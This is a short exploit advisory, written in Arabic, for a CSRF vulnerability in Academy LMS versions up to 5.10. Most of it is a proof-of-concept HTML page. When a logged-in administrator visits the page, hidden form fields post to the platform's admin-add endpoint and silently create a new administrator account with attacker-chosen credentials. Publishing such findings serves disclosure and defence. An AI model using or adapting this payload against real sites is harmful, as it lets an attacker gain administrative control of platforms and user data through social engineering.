
أكاديمي LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
أكاديمية LMS هو تطبيق يمكن للأشخاص من خلاله إنشاء الدورات الدراسية والإعلان عنها. القدرة على إضافة مستخدم إداري جديد معرضة لـ CSRF، مما يجعل من الممكن استخدام الهندسة الاجتماعية للحصول على وصول إداري على المنصة.
#إثبات المفهوم (POC) الخطوة الأولى في إثبات المفهوم هي المصادقة على المنصة باستخدام مستخدم إداري.
بعد ذلك، ببساطة قم بالوصول إلى الصفحة التي تحتوي على رمز استغلال الثغرة، ولاحظ أنه تم إضافة مستخدم إداري جديد إلى النظام.
الكود المستخدم في الاستغلال:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>